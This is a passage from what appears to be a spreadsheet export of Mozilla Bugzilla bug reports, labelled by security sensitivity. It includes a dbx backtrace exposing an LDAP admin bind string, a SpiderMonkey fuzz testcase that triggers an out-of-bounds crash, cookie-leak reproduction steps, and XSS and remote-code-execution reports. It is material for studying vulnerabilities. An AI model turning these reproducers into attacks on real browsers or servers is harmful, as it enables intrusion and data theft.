  [12] ssl_GatherRecord1stHandshake(ss = 0x7e9808), line 1300 in "sslcon.c"
  [13] ssl_Do1stHandshake(ss = 0x7e9808), line 156 in "sslsecur.c"
  [14] ssl_SecureSend(ss = 0x7e9808, buf = 0x7e93c4
"0Q^B^A^A`L^B^A^C^D@uid=admin,ou=Administrators,ou=topologyManagement,o=netscapeRoot\x80^Eadmindmindmin",
len = 83, flags = 0), line 1100 in "sslsecur.c"
  [15] ssl_Send(fd = 0x238b8, buf = 0x7e93c4, len = 83, flags = 0, timeout =
4294967295U), line 1212 in "sslsock.c"
  [16] PR_Send(fd = 0x238b8, buf = 0x7e93c4, amount = 83, flags = 0, timeout =
4294967295U), line 221 in "priometh.c"
dbx: warning: can't find file
"/share/builds/components2/mccrel/ldap/ldapsdk50moz/builds/20011120.1/spd02_Solaris2.6/mozilla/directory/c-sdk/ldap/libraries/libprldap/SunOS5.6_DBG.OBJ/ldappr-io.o"
  [17] prldap_write(0x1, 0x7e93c4, 0x53, 0x7e13f0, 0x0, 0x0), at 0xfefa1a38
dbx: warning: can't find file
"/share/builds/components2/mccrel/ldap/ldapsdk50moz/builds/20011120.1/spd02_Solaris2.6/mozilla/directory/c-sdk/ldap/libraries/libldap/../../../../../dist/SunOS5.6_DBG.OBJ/lib/liblber50.a(io.o)"
  [18] ber_flush(0x7e8be0, 0x7e92b8, 0x0, 0x0, 0x81010100, 0xff0000), at 0xff01afd8
dbx: warning: can't find file
"/share/builds/components2/mccrel/ldap/ldapsdk50moz/builds/20011120.1/spd02_Solaris2.6/mozilla/directory/c-sdk/ldap/libraries/libldap/SunOS5.6_DBG.OBJ/request.o"
  [19] nsldapi_ber_flush(0x7e8a28, 0x7e8be0, 0x7e92b8, 0x0, 0x1, 0x7e941b), at
0xfeff3fb4
  [20] nsldapi_send_server_request(0x7e8a28, 0x7e92b8, 0x1, 0x0, 0x0, 0x0), at
0xfeff3824
  [21] nsldapi_send_initial_request(0x8a4a0, 0x1, 0x60, 0x8a4a0, 0x7e92b8,
0x8a4a0), at 0xfeff25d8
dbx: warning: can't find file
"/share/builds/components2/mccrel/ldap/ldapsdk50moz/builds/20011120.1/spd02_Solaris2.6/mozilla/directory/c-sdk/ldap/libraries/libldap/SunOS5.6_DBG.OBJ/sbind.o"
  [22] simple_bind_nolock(0x80, 0x8a4a0, 0x89868, 0x0, 0x0, 0x7e2431), at 0xff00112c
  [23] simple_bindifnot_s(0x7e8a28, 0x8a4a0, 0x89868, 0xfcc2e3f4, 0xfcc2e3f0,
0x236a80), at 0xff0019ec
  [24] ldap_simple_bind_s(0x7e8a28, 0x8a4a0, 0x89868, 0xfcc2e3f4, 0xfcc2e3f0,
0x7e89f8), at 0xff001254
  [25] LdapSession::bindAsDefault(this = 0x7e89f8), line 190 in "LdapSession.cpp"
  [26] LdapSession::search(this = 0x7e89f8, base = 0x7b3320 "o=TestCentral",
scope = 2, filter = 0xfcc2e57c "uid=alpha", attrs = 0xff2e4698, attrsonly = 1,
retryCount = 0), line 229 in "LdapSession.cpp"
  [27] LdapSession::find(this = 0x7e89f8, base = 0x7b3320 "o=TestCentral", scope
= 2, filter = 0xfcc2e57c "uid=alpha", attrs = 0xff2e4698, attrsonly = 1, res =
(nil)), line 1088 in "LdapOps.cpp"
  [28] LdapSession::find_userdn(this = 0x7e89f8, uid = 0x408a18 "alpha", base =
0x7b3320 "o=TestCentral", dn = 0xfcc2eaa8), line 1158 in "LdapOps.cpp"
  [29] get_is_valid_password_ldap(errp = 0xfcc31658, subject = 0x4084f0,
resource = 0x408648, auth_info = 0x2c1198, global_auth = 0x7b2de0, unused =
(nil)), line 425 in "ldapacl.cpp"
  [30] ACL_GetAttribute(errp = 0xfcc31658, attr = 0xff2c70e9 "isvalid-password",
val = 0xfcc2f3e0, subject = 0x4084f0, resource = 0x408648, auth_info = 0x2c1198,
global_auth = 0x7b2de0), line 93 in "aclgetattr.cpp"
  [31] get_auth_user_basic(errp = 0xfcc31658, subject = 0x4084f0, resource =
0x408648, auth_info = 0x2c1198, global_auth = 0x7b2de0, unused = (nil)), line
500 in "auth.cpp"
  [32] ACL_GetAttribute(errp = 0xfcc31658, attr = 0xff2da824 "user", val =
0xfcc2f510, subject = 0x4084f0, resource = 0x408648, auth_info = 0x2c1198,
global_auth = 0x7b2de0), line 93 in "aclgetattr.cpp"
  [33] LASUserEval(errp = 0xfcc31658, attr_name = 0x2c0d40 "user", comparator =
CMP_OP_EQ, attr_pattern = 0x2c0d50 "alpha", cachable = 0xfcc2f5a0, LAS_cookie =
0x207398, subject = 0x4084f0, resource = 0x408648, auth_info = 0x2c1198,
global_auth = 0x7b2de0), line 75 in "lasuser.cpp"
  [34] ACLEvalAce(errp = 0xfcc31658, acleval = 0x7e2218, ace = 0x207338,
cachable = 0xfcc2f654, autharray = 0x734998, global_auth = 0x7b2de0), line 181
in "oneeval.cpp"
  [35] ACL_INTEvalTestRights(errp = 0xfcc31658, acleval = 0x7e2218, rights =
0xfcc316e4, map_generic = 0xff2d8e9c, deny_type = 0xfcc31648, deny_response =
0xfcc3164c, acl_tag = 0xfcc31644, expr_num = 0xfcc31640, cachable = 0xfcc310f8),
line 751 in "oneeval.cpp"
  [36] ACL_EvalTestRights(errp = 0xfcc31658, acleval = 0x7e2218, rights =
0xfcc316e0, map_generic = 0xff2d8e9c, deny_type = 0xfcc31648, deny_response =
0xfcc3164c, acl_tag = 0xfcc31644, expr_num = 0xfcc31640), line 956 in "oneeval.cpp"
  [37] ACL_SetupEval(acllist = 0x7b2ca0, sn = 0x405250, rq = 0x405298, rights =
0xfcc316e0, map_generic = 0xff2d8e9c, user = (nil)), line 237 in "aclframe.cpp"
  [38] pathcheck_helper(sn = 0x405250, rq = 0x405298, do_non_acl_pathchecks = 1,
execute_acllist = 1), line 450 in "httpact.cpp"
  [39] INTservact_pathchecks(sn = 0x405250, rq = 0x405298), line 582 in
"httpact.cpp"
  [40] INTservact_handle_processed(sn = 0x405250, rq = 0x405298), line 852 in
"httpact.cpp"
  [41] HttpRequest::UnacceleratedRespond(this = 0x4051a0, pzRequestLine =
0x4079b8 "GET /acl;foo/aclLS02.html HTTP/1.0", pzHost = 0x558130 "localhost",
pzAbsPath = 0x4079e0 "/acl;foo/aclLS02.html"), line 904 in "httprequest.cpp"
  [42] HttpRequest::HandleRequest(this = 0x4051a0, buf = 0x405940), line 518 in
"httprequest.cpp"
  [43] DaemonSession::run(this = 0x4018f8), line 524 in "daemonsession.cpp"
  [44] Thread::run_(this = 0x4018f8), line 234 in "Thread.cpp"
  [45] ThreadMain(thisObject = 0x4018f8), line 226 in "Thread.cpp"
  [46] _pt_root(arg = 0x405848), line 214 in "ptthread.c"
(dbx)</t>
        </is>
      </c>
      <c r="X2781" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2782">
      <c r="A2782" t="n">
        <v>494445</v>
      </c>
      <c r="B2782" t="inlineStr">
        <is>
          <t>2009-05-22 11:16:05 -0700</t>
        </is>
      </c>
      <c r="C2782" t="inlineStr">
        <is>
          <t>MirrorWrappedNativeParent result sometimes uninitialized [@ js_LockGCThingRT ]</t>
        </is>
      </c>
      <c r="D2782" t="inlineStr">
        <is>
          <t>2015-10-16 11:48:00 -0700</t>
        </is>
      </c>
      <c r="E2782" t="n">
        <v>1</v>
      </c>
      <c r="F2782" t="n">
        <v>1</v>
      </c>
      <c r="G2782" t="n">
        <v>3</v>
      </c>
      <c r="H2782" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2782" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2782" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K2782" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2782" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2782" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2782" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2782" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2782" t="inlineStr">
        <is>
          <t>[sg:critical?] required by 455633</t>
        </is>
      </c>
      <c r="Q2782" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2782" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2782" t="inlineStr">
        <is>
          <t>mozilla1.9.2a1</t>
        </is>
      </c>
      <c r="T2782" t="n">
        <v>1</v>
      </c>
      <c r="U2782" t="n">
        <v>0</v>
      </c>
      <c r="V2782" t="n">
        <v>8</v>
      </c>
      <c r="W2782" t="inlineStr">
        <is>
          <t>Created attachment 379193
v1
I was looking at crash reports, there's a number of crashes in js_LockGCThingRT being called from XPCNativeWrapper::GetNewOrUsed. We call js_LockGCThingRT on the result of a call to MirrorWrappedNativeParent. Turns out that MirrorWrappedNativeParent sometimes returns PR_TRUE without initializing the result out pointer. I think setting it to null would be the right thing to do.
I think that this probably shows up under a number of different crash signatures, because XPCNativeWrapperCtor also calls MirrorWrappedNativeParent and it uses the uninitialized pointer to set it as a parent by calling JS_SetParent.
Nominating for blocking and marking security sensitive.</t>
        </is>
      </c>
      <c r="X2782" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2783">
      <c r="A2783" t="n">
        <v>1435758</v>
      </c>
      <c r="B2783" t="inlineStr">
        <is>
          <t>2018-02-05 08:56:11 -0800</t>
        </is>
      </c>
      <c r="C2783" t="inlineStr">
        <is>
          <t>socorro deploy: 307</t>
        </is>
      </c>
      <c r="D2783" t="inlineStr">
        <is>
          <t>2018-02-06 12:09:48 -0800</t>
        </is>
      </c>
      <c r="E2783" t="n">
        <v>1</v>
      </c>
      <c r="F2783" t="n">
        <v>1</v>
      </c>
      <c r="G2783" t="n">
        <v>4</v>
      </c>
      <c r="H2783" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2783" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J2783" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K2783" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2783" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2783" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2783" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2783" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2783" t="inlineStr"/>
      <c r="Q2783" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2783" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2783" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2783" t="n">
        <v>1</v>
      </c>
      <c r="U2783" t="n">
        <v>0</v>
      </c>
      <c r="V2783" t="n">
        <v>7</v>
      </c>
      <c r="W2783" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 307.
It consists of the following:
(current tag: 306 - 798fb289)
5d48850e      fixes bug 1431108 - removes symbols admin view 
18d8adbd      bug 1431108 - remove manage/js/symbols-uploads.js file 
52ba3561      Switch Docker image to Ubuntu, and restore auto-concurrency (#4313) 
2e01982b      Fix path to requirements.txt file for Pyup 
d505b6b9      fixes bug 1429598 - fixes pseudo-booleans in Elasticsearch 
6d5231c7      Fix a comment and a test 
2f8af28c      fixes bug 1434676 - remove crashes per 100 adi graphs 
778a7a98      Nix "days" argument 
951d63a3      Drop home.js altogether 
a16202ee      fixes bug 1434678 - add message about rates to crashes-per-day graph 
f4d7e79d      fixes bug 1132858 - remove the extensions table 
e9fe93d5      Fix extension table removing migration 
ea24ac35      Fix path to renamed /requirements/requirements.txt file (#4324) 
(next tag: 307 - ea24ac35)
After deploy:
* update -prod admin node
* perform alembic migrations</t>
        </is>
      </c>
      <c r="X2783" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2784">
      <c r="A2784" t="n">
        <v>306901</v>
      </c>
      <c r="B2784" t="inlineStr">
        <is>
          <t>2005-09-02 16:40:11 -0700</t>
        </is>
      </c>
      <c r="C2784" t="inlineStr">
        <is>
          <t>Release of Bugzilla 2.18.4, 2.20, and 2.21.1</t>
        </is>
      </c>
      <c r="D2784" t="inlineStr">
        <is>
          <t>2005-09-30 19:32:04 -0700</t>
        </is>
      </c>
      <c r="E2784" t="n">
        <v>1</v>
      </c>
      <c r="F2784" t="n">
        <v>1</v>
      </c>
      <c r="G2784" t="n">
        <v>4</v>
      </c>
      <c r="H2784" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2784" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2784" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K2784" t="inlineStr">
        <is>
          <t>2.21</t>
        </is>
      </c>
      <c r="L2784" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2784" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2784" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2784" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2784" t="inlineStr"/>
      <c r="Q2784" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2784" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S2784" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T2784" t="n">
        <v>1</v>
      </c>
      <c r="U2784" t="n">
        <v>0</v>
      </c>
      <c r="V2784" t="n">
        <v>13</v>
      </c>
      <c r="W2784" t="inlineStr">
        <is>
          <t>2.20 hasn't yet had a chance to get wide-scale testing on bugzilla.mozilla.org,
but we've had a fairly long release-candidate cycle, with a lot of people
downloading 2.20rc2.
So, I think 2.20 is stable enough to release. It seems to be working quite well
for many people who have downloaded it (I've been watching the mozilla-webtools
lists).
We will also release our first development release of 2.21.</t>
        </is>
      </c>
      <c r="X2784" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="2785">
      <c r="A2785" t="n">
        <v>1528335</v>
      </c>
      <c r="B2785" t="inlineStr">
        <is>
          <t>2019-02-15 10:33:05 -0800</t>
        </is>
      </c>
      <c r="C2785" t="inlineStr">
        <is>
          <t>`InstallTrigger` and `mozAddonManager` leaking cookies in private browsing mode</t>
        </is>
      </c>
      <c r="D2785" t="inlineStr">
        <is>
          <t>2020-06-05 00:04:48 -0700</t>
        </is>
      </c>
      <c r="E2785" t="n">
        <v>1</v>
      </c>
      <c r="F2785" t="n">
        <v>1</v>
      </c>
      <c r="G2785" t="n">
        <v>3</v>
      </c>
      <c r="H2785" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2785" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J2785" t="inlineStr">
        <is>
          <t>Add-ons Manager</t>
        </is>
      </c>
      <c r="K2785" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L2785" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2785" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2785" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2785" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2785" t="inlineStr">
        <is>
          <t>[fingerprinting][post-critsmash-triage][adv-main68+]</t>
        </is>
      </c>
      <c r="Q2785" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R2785" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2785" t="inlineStr">
        <is>
          <t>mozilla68</t>
        </is>
      </c>
      <c r="T2785" t="n">
        <v>1</v>
      </c>
      <c r="U2785" t="n">
        <v>0</v>
      </c>
      <c r="V2785" t="n">
        <v>28</v>
      </c>
      <c r="W2785" t="inlineStr">
        <is>
          <t>In private browsing mode, websites that call `InstallTrigger` to trigger the install of a download leak cookies that were set outside of private browsing mode in the request to fetch the add-on file.
The same counts for AMO, that is using `mozAddonManager`: When installing an add-on from AMO in private browsing mode, the non-private browsing cookies from AMO are included in the request to fetch the file.
exemplary STR for AMO:
1. Open AMO in non-private browsing mode
2. Open the devtools and make note of the "sessionid" cookie for requests.
3. Clear your cache (important!)
4. Open AMO in private browsing mode.
5. In the web console, execute:
```navigator.mozAddonManager.createInstall({ url: "https://addons.mozilla.org/firefox/downloads/file/1672871/ublock_origin-1.18.4-an+fx.xpi", hash: "sha256:b7aa57bd91943a2d3dd3621872e8700b2f59665db5c92fc54bca5049780cc91c" }).then((install) =&gt; { install.install(); })```
(This is pretty much what clicking on the "Add to Firefox" button would do).
6. In the network panel, inspect the request to get that file and check the cookies. The "sessionid" cookie should be identical to the one in (2).</t>
        </is>
      </c>
      <c r="X2785" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2786">
      <c r="A2786" t="n">
        <v>1282502</v>
      </c>
      <c r="B2786" t="inlineStr">
        <is>
          <t>2016-06-27 10:01:43 -0700</t>
        </is>
      </c>
      <c r="C2786" t="inlineStr">
        <is>
          <t>Crash [@ js::frontend::BytecodeEmitter::emitUnaliasedVarOp] or Assertion failure: num &lt;= (65535), at jsscript.h:451</t>
        </is>
      </c>
      <c r="D2786" t="inlineStr">
        <is>
          <t>2017-05-03 06:29:45 -0700</t>
        </is>
      </c>
      <c r="E2786" t="n">
        <v>1</v>
      </c>
      <c r="F2786" t="n">
        <v>1</v>
      </c>
      <c r="G2786" t="n">
        <v>3</v>
      </c>
      <c r="H2786" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I2786" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J2786" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K2786" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2786" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M2786" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N2786" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2786" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2786" t="inlineStr">
        <is>
          <t>[jsbugmon:update][adv-main48+][adv-esr45.3+]</t>
        </is>
      </c>
      <c r="Q2786" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2786" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S2786" t="inlineStr">
        <is>
          <t>mozilla50</t>
        </is>
      </c>
      <c r="T2786" t="n">
        <v>1</v>
      </c>
      <c r="U2786" t="n">
        <v>0</v>
      </c>
      <c r="V2786" t="n">
        <v>15</v>
      </c>
      <c r="W2786" t="inlineStr">
        <is>
          <t>The following testcase crashes on mozilla-central revision 0e073f5ca38a (build with --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --disable-debug --without-intl-api --enable-optimize --target=i686-pc-linux-gnu, run with --fuzzing-safe):
try {
    for (var i = 0; i &lt; 20000; i++) {
        r &amp;= f();
    }
} catch (exc) {}
evaluate(`
let s = '  {';
let max = 65536;
for (let target  = 0; i &lt; max; i++)
  s += "let ns" + i + " = "+ i +";\\n";
s += "};";
eval(s);
`);
Backtrace:
 received signal SIGSEGV, Segmentation fault.
js::frontend::BytecodeEmitter::emitUnaliasedVarOp (op=JSOP_INITLEXICAL, checkLexical=js::DontCheckLexical, checkLexical=js::DontCheckLexical, slot=65535, op=JSOP_INITLEXICAL, this=0xffffbe50) at js/src/frontend/BytecodeEmitter.cpp:1201
#0  js::frontend::BytecodeEmitter::emitUnaliasedVarOp (op=JSOP_INITLEXICAL, checkLexical=js::DontCheckLexical, checkLexical=js::DontCheckLexical, slot=65535, op=JSOP_INITLEXICAL, this=0xffffbe50) at js/src/frontend/BytecodeEmitter.cpp:1201
#1  js::frontend::BytecodeEmitter::initializeBlockScopedLocalsFromStack (this=0xffffbe50, blockScope=...) at js/src/frontend/BytecodeEmitter.cpp:3158
#2  0x08624b3d in js::frontend::BytecodeEmitter::enterBlockScope (this=0xffffbe50, stmtInfo=0xffffb128, objbox=0xf79c3218, initialValueOp=JSOP_UNINITIALIZED, alreadyPushed=0) at js/src/frontend/BytecodeEmitter.cpp:3191
#3  0x0862a504 in js::frontend::BytecodeEmitter::emitLexicalScope (this=0xffffbe50, pn=0xf79c3228) at js/src/frontend/BytecodeEmitter.cpp:5555
#4  0x08624eba in js::frontend::BytecodeEmitter::emitTree (this=0xffffbe50, pn=0xf79c3228, emitLineNote=js::frontend::BytecodeEmitter::EMIT_LINENOTE) at js/src/frontend/BytecodeEmitter.cpp:8968
#5  0x0862bad3 in js::frontend::BytecodeEmitter::emitStatementList (this=0xffffbe50, pn=0xf79c31c8) at js/src/frontend/BytecodeEmitter.cpp:7194
#6  0x08625202 in js::frontend::BytecodeEmitter::emitTree (this=0xffffbe50, pn=0xf79c31c8, emitLineNote=js::frontend::BytecodeEmitter::EMIT_LINENOTE) at js/src/frontend/BytecodeEmitter.cpp:8813
#7  0x0862a520 in js::frontend::BytecodeEmitter::emitLexicalScope (this=0xffffbe50, pn=0xf79c31a0) at js/src/frontend/BytecodeEmitter.cpp:5568
#8  0x08624eba in js::frontend::BytecodeEmitter::emitTree (this=0xffffbe50, pn=0xf79c31a0, emitLineNote=js::frontend::BytecodeEmitter::EMIT_LINENOTE) at js/src/frontend/BytecodeEmitter.cpp:8968
#9  0x086256cb in BytecodeCompiler::prepareAndEmitTree (this=0xffffb554, ppn=0xffffb334) at js/src/frontend/BytecodeCompiler.cpp:356
#10 0x08625cab in BytecodeCompiler::compileScript (this=0xffffb554, scopeChain=..., evalCaller=...) at js/src/frontend/BytecodeCompiler.cpp:539
#11 0x08625e2f in js::frontend::CompileScript (cx=0xf7977140, alloc=0xf7928198, scopeChain=..., enclosingStaticScope=..., evalCaller=..., options=..., srcBuf=..., source_=0xf3cb2180, extraSct=0x0, sourceObjectOut=0x0) at js/src/frontend/BytecodeCompiler.cpp:742
#12 0x0846aa54 in EvalKernel (cx=cx@entry=0xf7977140, v=..., v@entry=..., evalType=evalType@entry=DIRECT_EVAL, caller=..., scopeobj=..., pc=0xf4b07016 "{", vp=...) at js/src/builtin/Eval.cpp:321
#13 0x0846addc in js::DirectEval (cx=0xf7977140, v=..., vp=...) at js/src/builtin/Eval.cpp:451
#14 0x0818ada5 in js::jit::DoCallFallback (cx=0xf7977140, frame=0xffffc5d8, stub_=0xf798b3b8, argc=1, vp=0xffffc590, res=...) at js/src/jit/BaselineIC.cpp:5955
#15 0xf7be8181 in ?? ()
#16 0xf798b3b8 in ?? ()
#17 0xf7be292e in ?? ()
#18 0x0815fb83 in EnterBaseline (cx=0xf798b3b8, cx@entry=0xf7977140, data=...) at js/src/jit/BaselineJIT.cpp:156
#19 0x08162b1c in js::jit::EnterBaselineAtBranch (cx=0xf7977140, fp=0xf4b1c088, pc=0xf4b06fdd "ず") at js/src/jit/BaselineJIT.cpp:262
#20 0x084ed99f in Interpret (cx=0xf7977140, state=...) at js/src/vm/Interpreter.cpp:1877
#21 0x084edd7a in js::RunScript (cx=0xf7977140, state=...) at js/src/vm/Interpreter.cpp:398
#22 0x084efe8d in js::ExecuteKernel (result=0xf4b1c060, evalInFrame=..., newTargetValue=..., scopeChainArg=..., script=..., cx=0xf7977140) at js/src/vm/Interpreter.cpp:676
#23 js::Execute (cx=0xf7977140, script=..., scopeChainArg=..., rval=0xf4b1c060) at js/src/vm/Interpreter.cpp:709
#24 0x0837bab9 in ExecuteScript (cx=cx@entry=0xf7977140, scope=scope@entry=..., script=script@entry=..., rval=0xf4b1c060) at js/src/jsapi.cpp:4364
#25 0x08381e76 in JS_ExecuteScript (cx=0xf7977140, scriptArg=..., rval=...) at js/src/jsapi.cpp:4390
#26 0x08083a61 in Evaluate (cx=0xf7977140, argc=1, vp=0xf4b1c060) at js/src/shell/js.cpp:1480
#27 0x084ee1d5 in js::CallJSNative (args=..., native=&lt;optimized out&gt;, cx=0xf7977140) at js/src/jscntxtinlines.h:235
[...]
#40 Shell (envp=&lt;optimized out&gt;, op=0xffffd7a0, cx=&lt;optimized out&gt;) at js/src/shell/js.cpp:7050
#41 main (argc=3, argv=0xffffd8e4, envp=0xffffd8f4) at js/src/shell/js.cpp:7432
eax	0xffffbf24	-16604
ebx	0xffff	65535
ecx	0xf3cb1220	-204795360
edx	0xf4e571f0	-186289680
esi	0x898fff4	144244724
edi	0xffffbe50	-16816
ebp	0x10001	65537
esp	0xffffb04c	4294946892
eip	0x8620523 &lt;js::frontend::BytecodeEmitter::initializeBlockScopedLocalsFromStack(JS::Handle&lt;js::StaticBlockScope*&gt;)+227&gt;
=&gt; 0x8620523 &lt;js::frontend::BytecodeEmitter::initializeBlockScopedLocalsFromStack(JS::Handle&lt;js::StaticBlockScope*&gt;)+227&gt;:	mov    (%eax,%ebx,4),%ebx
   0x8620526 &lt;js::frontend::BytecodeEmitter::initializeBlockScopedLocalsFromStack(JS::Handle&lt;js::StaticBlockScope*&gt;)+230&gt;:	pushl  0x20(%esp)
Looks like an out of bounds access to me, marking s-s and sec-high at least.</t>
        </is>
      </c>
      <c r="X2786" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2787">
      <c r="A2787" t="n">
        <v>619637</v>
      </c>
      <c r="B2787" t="inlineStr">
        <is>
          <t>2010-12-16 00:29:08 -0800</t>
        </is>
      </c>
      <c r="C2787" t="inlineStr">
        <is>
          <t>[SECURITY] XSS in user autocomplete due to lack of encoding by YUI</t>
        </is>
      </c>
      <c r="D2787" t="inlineStr">
        <is>
          <t>2013-01-28 10:06:45 -0800</t>
        </is>
      </c>
      <c r="E2787" t="n">
        <v>1</v>
      </c>
      <c r="F2787" t="n">
        <v>1</v>
      </c>
      <c r="G2787" t="n">
        <v>4</v>
      </c>
      <c r="H2787" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I2787" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J2787" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K2787" t="inlineStr">
        <is>
          <t>3.7.1</t>
        </is>
      </c>
      <c r="L2787" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M2787" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N2787" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O2787" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2787" t="inlineStr">
        <is>
          <t>[infrasec:xss][ws:critical]</t>
        </is>
      </c>
      <c r="Q2787" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2787" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S2787" t="inlineStr">
        <is>
          <t>Bugzilla 4.0</t>
        </is>
      </c>
      <c r="T2787" t="n">
        <v>1</v>
      </c>
      <c r="U2787" t="n">
        <v>0</v>
      </c>
      <c r="V2787" t="n">
        <v>17</v>
      </c>
      <c r="W2787" t="inlineStr">
        <is>
          <t>If a user's real name field happens to contain XSS, the user autocomplete UI will happily execute it, as it does no escaping of any potential valid HTML.
http://yuilibrary.com/forum/viewtopic.php?p=12923 talks about the problem somewhat.</t>
        </is>
      </c>
      <c r="X2787" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="2788">
      <c r="A2788" t="n">
        <v>1320057</v>
      </c>
      <c r="B2788" t="inlineStr">
        <is>
          <t>2016-11-24 03:51:30 -0800</t>
        </is>
      </c>
      <c r="C2788" t="inlineStr">
        <is>
          <t>Remote code execution vulnerability in Pocket extension</t>
        </is>
      </c>
      <c r="D2788" t="inlineStr">
        <is>
          <t>2024-05-30 09:23:33 -0700</t>
        </is>
      </c>
      <c r="E2788" t="n">
        <v>1</v>
      </c>
      <c r="F2788" t="n">
        <v>1</v>
      </c>
      <c r="G2788" t="n">
        <v>2</v>
      </c>
      <c r="H2788" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I2788" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J2788" t="inlineStr">
        <is>
          <t>Pocket</t>
        </is>
      </c>
      <c r="K2788" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L2788" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M2788" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N2788" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O2788" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P2788" t="inlineStr">
        <is>
          <t>[adv-main50.1+][adv-esr45.6+]</t>
        </is>
      </c>
      <c r="Q2788" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R2788" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S2788" t="inlineStr">
        <is>
          <t>Firefox 53</t>
        </is>
      </c>
      <c r="T2788" t="n">
        <v>1</v>
      </c>
      <c r="U2788" t="n">
        <v>0</v>
      </c>
